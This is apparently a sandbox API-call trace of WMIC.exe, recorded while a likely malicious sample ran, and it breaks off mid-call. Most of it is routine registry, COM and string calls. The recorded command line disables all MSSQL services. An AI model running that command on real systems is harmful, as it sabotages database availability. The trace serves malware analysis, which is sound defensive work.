RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xabf414, lpcbData=0xabf410*=0x400 | out: lpType=0x0, lpData=0xabf414*=0x36, lpcbData=0xabf410*=0xc) returned 0x0 [0114.657] _wtol (_String="65536") returned 65536 [0114.657] RegCloseKey (hKey=0x0) returned 0x6 [0114.657] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xabf8a8 | out: ppv=0xabf8a8*=0x11545a8) returned 0x0 [0114.666] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x11545a8, xmlSource=0xabf828*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xabf88c | out: isSuccessful=0xabf88c*=0xffff) returned 0x0 [0114.708] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x11545a8, DOMElement=0xabf8a0 | out: DOMElement=0xabf8a0) returned 0x0 [0114.709] SysStringLen (param_1="VALUE") returned 0x5 [0114.709] SysStringLen (param_1="TABLE") returned 0x5 [0114.709] SysStringLen (param_1="TABLE") returned 0x5 [0114.709] SysStringLen (param_1="VALUE") returned 0x5 [0114.710] SysStringLen (param_1="LIST") returned 0x4 [0114.710] SysStringLen (param_1="TABLE") returned 0x5 [0114.710] SysStringLen (param_1="RAWXML") returned 0x6 [0114.710] SysStringLen (param_1="TABLE") returned 0x5 [0114.710] SysStringLen (param_1="RAWXML") returned 0x6 [0114.710] SysStringLen (param_1="LIST") returned 0x4 [0114.710] SysStringLen (param_1="LIST") returned 0x4 [0114.710] SysStringLen (param_1="RAWXML") returned 0x6 [0114.711] SysStringLen (param_1="HTABLE") returned 0x6 [0114.711] SysStringLen (param_1="TABLE") returned 0x5 [0114.711] SysStringLen (param_1="HTABLE") returned 0x6 [0114.711] SysStringLen (param_1="LIST") returned 0x4 [0114.711] SysStringLen (param_1="HFORM") returned 0x5 [0114.711] SysStringLen (param_1="TABLE") returned 0x5 [0114.711] SysStringLen (param_1="HFORM") returned 0x5 [0114.711] SysStringLen (param_1="LIST") returned 0x4 [0114.711] SysStringLen (param_1="HFORM") returned 0x5 [0114.711] SysStringLen (param_1="HTABLE") returned 0x6 [0114.712] SysStringLen (param_1="XML") returned 0x3 [0114.712] SysStringLen (param_1="TABLE") returned 0x5 [0114.712] SysStringLen (param_1="XML") returned 0x3 [0114.712] SysStringLen (param_1="VALUE") returned 0x5 [0114.712] SysStringLen (param_1="VALUE") returned 0x5 [0114.712] SysStringLen (param_1="XML") returned 0x3 [0114.712] SysStringLen (param_1="MOF") returned 0x3 [0114.712] SysStringLen (param_1="TABLE") returned 0x5 [0114.712] SysStringLen (param_1="MOF") returned 0x3 [0114.712] SysStringLen (param_1="LIST") returned 0x4 [0114.713] SysStringLen (param_1="MOF") returned 0x3 [0114.713] SysStringLen (param_1="RAWXML") returned 0x6 [0114.713] SysStringLen (param_1="LIST") returned 0x4 [0114.713] SysStringLen (param_1="MOF") returned 0x3 [0114.713] SysStringLen (param_1="CSV") returned 0x3 [0114.713] SysStringLen (param_1="TABLE") returned 0x5 [0114.713] SysStringLen (param_1="CSV") returned 0x3 [0114.713] SysStringLen (param_1="LIST") returned 0x4 [0114.713] SysStringLen (param_1="CSV") returned 0x3 [0114.713] SysStringLen (param_1="HTABLE") returned 0x6 [0114.713] SysStringLen (param_1="CSV") returned 0x3 [0114.713] SysStringLen (param_1="HFORM") returned 0x5 [0114.714] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.714] SysStringLen (param_1="TABLE") returned 0x5 [0114.714] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.714] SysStringLen (param_1="VALUE") returned 0x5 [0114.714] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.714] SysStringLen (param_1="XML") returned 0x3 [0114.714] SysStringLen (param_1="XML") returned 0x3 [0114.714] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.715] SysStringLen (param_1="texttablewsys") returned 0xd [0114.715] SysStringLen (param_1="TABLE") returned 0x5 [0114.715] SysStringLen (param_1="texttablewsys") returned 0xd [0114.715] SysStringLen (param_1="XML") returned 0x3 [0114.715] SysStringLen (param_1="texttablewsys") returned 0xd [0114.715] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.715] SysStringLen (param_1="XML") returned 0x3 [0114.715] SysStringLen (param_1="texttablewsys") returned 0xd [0114.715] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.715] SysStringLen (param_1="TABLE") returned 0x5 [0114.715] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.715] SysStringLen (param_1="XML") returned 0x3 [0114.715] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.715] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.715] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.716] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.716] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0114.716] SysStringLen (param_1="TABLE") returned 0x5 [0114.716] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0114.716] SysStringLen (param_1="XML") returned 0x3 [0114.716] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0114.716] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.716] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0114.716] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.716] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.716] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0114.717] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0114.717] SysStringLen (param_1="TABLE") returned 0x5 [0114.717] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0114.717] SysStringLen (param_1="XML") returned 0x3 [0114.717] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0114.717] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.717] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0114.717] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.717] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.717] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0114.717] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0114.717] SysStringLen (param_1="TABLE") returned 0x5 [0114.717] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0114.717] SysStringLen (param_1="XML") returned 0x3 [0114.717] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0114.717] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.718] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0114.718] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.718] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0114.718] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0114.718] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.718] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0114.718] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0114.718] SysStringLen (param_1="TABLE") returned 0x5 [0114.718] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0114.718] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.718] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0114.718] SysStringLen (param_1="XML") returned 0x3 [0114.718] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0114.718] SysStringLen (param_1="texttablewsys") returned 0xd [0114.718] SysStringLen (param_1="XML") returned 0x3 [0114.718] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0114.719] SysStringLen (param_1="htable-sortby") returned 0xd [0114.719] SysStringLen (param_1="TABLE") returned 0x5 [0114.719] SysStringLen (param_1="htable-sortby") returned 0xd [0114.719] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.719] SysStringLen (param_1="htable-sortby") returned 0xd [0114.719] SysStringLen (param_1="XML") returned 0x3 [0114.719] SysStringLen (param_1="htable-sortby") returned 0xd [0114.719] SysStringLen (param_1="texttablewsys") returned 0xd [0114.719] SysStringLen (param_1="htable-sortby") returned 0xd [0114.719] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0114.719] SysStringLen (param_1="XML") returned 0x3 [0114.719] SysStringLen (param_1="htable-sortby") returned 0xd [0114.720] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0114.720] SysStringLen (param_1="TABLE") returned 0x5 [0114.720] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0114.720] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.720] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0114.720] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.720] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0114.720] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0114.720] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.720] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0114.721] SysStringLen (param_1="wmiclimofformat") returned 0xf [0114.721] SysStringLen (param_1="TABLE") returned 0x5 [0114.721] SysStringLen (param_1="wmiclimofformat") returned 0xf [0114.721] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.721] SysStringLen (param_1="wmiclimofformat") returned 0xf [0114.721] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.721] SysStringLen (param_1="wmiclimofformat") returned 0xf [0114.721] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0114.721] SysStringLen (param_1="wmiclimofformat") returned 0xf [0114.721] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0114.721] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.721] SysStringLen (param_1="wmiclimofformat") returned 0xf [0114.721] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0114.721] SysStringLen (param_1="TABLE") returned 0x5 [0114.721] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0114.721] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.721] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0114.721] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.721] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0114.721] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0114.721] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0114.721] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0114.722] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0114.722] SysStringLen (param_1="TABLE") returned 0x5 [0114.722] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0114.722] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0114.722] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0114.722] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0114.722] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0114.722] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0114.722] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0114.722] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0114.722] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0114.722] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0114.722] FreeThreadedDOMDocument:IUnknown:Release (This=0x11545a8) returned 0x0 [0114.722] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'" [0114.722] memcpy_s (in: _Destination=0xd98058, _DestinationSize=0x9e, _Source=0xc31588, _SourceSize=0x9a | out: _Destination=0xd98058) returned 0x0 [0114.723] GetLocalTime (in: lpSystemTime=0xabf850 | out: lpSystemTime=0xabf850*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0x7, wMilliseconds=0x243)) [0114.723] _vsnwprintf (in: _Buffer=0xd98100, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xabf830 | out: _Buffer="04-15-2018T10:09:07") returned 19 [0114.723] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.723] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.723] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.723] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.723] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.723] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.723] lstrlenW (lpString="SERVICE") returned 7 [0114.723] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0114.723] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.723] lstrlenW (lpString="WHERE") returned 5 [0114.723] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0114.723] memmove_s (in: _Destination=0xd92c78, _DestinationSize=0x4, _Source=0xd92c68, _SourceSize=0x4 | out: _Destination=0xd92c78) returned 0x0 [0114.723] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.723] lstrlenW (lpString="'caption LIKE '%MSSQL%''") returned 24 [0114.723] _wcsicmp (_String1="'caption LIKE '%MSSQL%''", _String2="\"NULL\"") returned 5 [0114.723] lstrlenW (lpString="'caption LIKE '%MSSQL%''") returned 24 [0114.723] lstrlenW (lpString="'caption LIKE '%MSSQL%''") returned 24 [0114.723] memmove_s (in: _Destination=0xd97f38, _DestinationSize=0x8, _Source=0xd92c78, _SourceSize=0x8 | out: _Destination=0xd97f38) returned 0x0 [0114.724] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.724] lstrlenW (lpString="CALL") returned 4 [0114.724] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0114.724] memmove_s (in: _Destination=0xd97f80, _DestinationSize=0xc, _Source=0xd97f38, _SourceSize=0xc | out: _Destination=0xd97f80) returned 0x0 [0114.724] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.724] lstrlenW (lpString="ChangeStartMode") returned 15 [0114.724] _wcsicmp (_String1="ChangeStartMode", _String2="\"NULL\"") returned 65 [0114.724] memmove_s (in: _Destination=0xd922b8, _DestinationSize=0x10, _Source=0xd97f80, _SourceSize=0x10 | out: _Destination=0xd922b8) returned 0x0 [0114.724] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'") returned 73 [0114.724] lstrlenW (lpString="'Disabled'") returned 10 [0114.724] _wcsicmp (_String1="'Disabled'", _String2="\"NULL\"") returned 5 [0114.724] lstrlenW (lpString="'Disabled'") returned 10 [0114.724] lstrlenW (lpString="'Disabled'") returned 10 [0114.724] lstrlenW (lpString="QUIT") returned 4 [0114.724] lstrlenW (lpString="SERVICE") returned 7 [0114.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0114.724] lstrlenW (lpString="EXIT") returned 4 [0114.724] lstrlenW (lpString="SERVICE") returned 7 [0114.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0114.724] WbemLocator:IUnknown:AddRef (This=0xc30500) returned 0x2 [0114.724] lstrlenW (lpString="/") returned 1 [0114.725] lstrlenW (lpString="SERVICE") returned 7 [0114.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0114.725] lstrlenW (lpString="-") returned 1 [0114.725] lstrlenW (lpString="SERVICE") returned 7 [0114.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0114.725] lstrlenW (lpString="CLASS") returned 5 [0114.725] lstrlenW (lpString="SERVICE") returned 7 [0114.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0114.725] lstrlenW (lpString="PATH") returned 4 [0114.725] lstrlenW (lpString="SERVICE") returned 7 [0114.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0114.725] lstrlenW (lpString="CONTEXT") returned 7 [0114.725] lstrlenW (lpString="SERVICE") returned 7 [0114.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0114.725] lstrlenW (lpString="SERVICE") returned 7 [0114.725] lstrlenW (lpString="SERVICE") returned 7 [0114.725] GetCurrentThreadId () returned 0xf0c [0114.725] ??0CHString@@QAE@XZ () returned 0xabf7a4 [0114.725] WbemLocator:IWbemLocator:ConnectServer (in: This=0xc30500, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xc60620) returned 0x0 [0114.761] CoSetProxyBlanket (pProxy=0xc60620, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0114.761] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.761] GetCurrentThreadId () returned 0xf0c [0114.761] ??0CHString@@QAE@XZ () returned 0xabf74c [0114.761] SysStringLen (param_1="root\\cli") returned 0x8 [0114.761] SysStringLen (param_1="\\") returned 0x1 [0114.761] SysStringLen (param_1="root\\cli\\") returned 0x9 [0114.761] SysStringLen (param_1="ms_409") returned 0x6 [0114.762] WbemLocator:IWbemLocator:ConnectServer (in: This=0xc30500, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xc607b0) returned 0x0 [0114.775] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.775] GetCurrentThreadId () returned 0xf0c [0114.775] ??0CHString@@QAE@XZ () returned 0xabf7a8 [0114.775] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0114.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xd98a78, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0114.775] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0114.775] SysStringLen (param_1="SERVICE") returned 0x7 [0114.775] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0114.775] SysStringLen (param_1="'") returned 0x1 [0114.776] IWbemServices:GetObject (in: This=0xc60620, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xabf7a4*=0x0, ppCallResult=0x0 | out: ppObject=0xabf7a4*=0xc85358, ppCallResult=0x0) returned 0x0 [0114.784] IWbemClassObject:Get (in: This=0xc85358, wszName="Target", lFlags=0, pVal=0xabf77c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf77c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.784] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0114.784] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0114.784] IWbemClassObject:Get (in: This=0xc85358, wszName="PWhere", lFlags=0, pVal=0xabf77c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf77c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.784] lstrlenW (lpString="WHERE Name='#'") returned 14 [0114.784] lstrlenW (lpString="WHERE Name='#'") returned 14 [0114.784] IWbemClassObject:Get (in: This=0xc85358, wszName="Connection", lFlags=0, pVal=0xabf77c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf77c*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc85718, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.784] IUnknown:QueryInterface (in: This=0xc85718, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xabf798 | out: ppvObject=0xabf798*=0xc85718) returned 0x0 [0114.784] GetCurrentThreadId () returned 0xf0c [0114.784] ??0CHString@@QAE@XZ () returned 0xabf718 [0114.785] IWbemClassObject:Get (in: This=0xc85718, wszName="Namespace", lFlags=0, pVal=0xabf6fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf6fc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.785] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0114.785] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0114.785] IWbemClassObject:Get (in: This=0xc85718, wszName="Locale", lFlags=0, pVal=0xabf6fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc67024, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf6fc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.785] lstrlenW (lpString="ms_409") returned 6 [0114.785] lstrlenW (lpString="ms_409") returned 6 [0114.785] IWbemClassObject:Get (in: This=0xc85718, wszName="User", lFlags=0, pVal=0xabf6fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc67024, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf6fc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.785] IWbemClassObject:Get (in: This=0xc85718, wszName="Password", lFlags=0, pVal=0xabf6fc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf6fc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.785] IWbemClassObject:Get (in: This=0xc85718, wszName="Server", lFlags=0, pVal=0xabf6fc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf6fc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.785] lstrlenW (lpString=".") returned 1 [0114.785] lstrlenW (lpString=".") returned 1 [0114.785] IWbemClassObject:Get (in: This=0xc85718, wszName="Authority", lFlags=0, pVal=0xabf6fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc67024, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf6fc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.785] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.786] IUnknown:Release (This=0xc85718) returned 0x1 [0114.786] GetCurrentThreadId () returned 0xf0c [0114.786] ??0CHString@@QAE@XZ () returned 0xabf708 [0114.786] IWbemClassObject:Get (in: This=0xc85358, wszName="__RELPATH", lFlags=0, pVal=0xabf6f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xabf6f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0114.786] GetCurrentThreadId () returned 0xf0c [0114.786] ??0CHString@@QAE@XZ () returned 0xabf684 [0114.786] ??0CHString@@QAE@PBG@Z () returned 0xabf680 [0114.786] ??0CHString@@QAE@ABV0@@Z () returned 0xabf600 [0114.786] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0114.786] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xd98ab8 [0114.786] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0114.786] ?Left@CHString@@QBE?AV1@H@Z () returned 0xabf5f8 [0114.786] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xabf5fc [0114.786] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xabf680 [0114.786] ??1CHString@@QAE@XZ () returned 0x1 [0114.786] ??1CHString@@QAE@XZ () returned 0x1 [0114.786] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xabf5f4 [0114.786] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xabf600 [0114.786] ??1CHString@@QAE@XZ () returned 0x1 [0114.786] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xd98b18 [0114.786] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0114.786] ?Left@CHString@@QBE?AV1@H@Z () returned 0xabf5f8 [0114.786] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xabf5fc [0114.786] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xabf680 [0114.786] ??1CHString@@QAE@XZ () returned 0x1 [0114.786] ??1CHString@@QAE@XZ () returned 0x1 [0114.787] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xabf5f4 [0114.787] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xabf600 [0114.787] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.787] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0114.787] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.787] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0114.787] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0114.787] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0114.787] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0114.787] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0114.787] SysStringLen (param_1="\"") returned 0x1 [0114.787] IWbemServices:GetObject (in: This=0xc607b0, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xabf690*=0x0, ppCallResult=0x0 | out: ppObject=0xabf690*=0xc85af8, ppCallResult=0x0) returned 0x0 [0114.790] IWbemClassObject:Get (in: This=0xc85af8, wszName="Text", lFlags=0, 